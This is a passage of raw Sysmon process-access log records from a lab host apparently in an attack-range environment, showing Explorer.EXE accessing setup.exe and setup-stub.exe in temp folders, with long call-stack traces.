13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.677{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000015552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000015548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000015546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000015544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000015543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000015542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000015541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.599{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.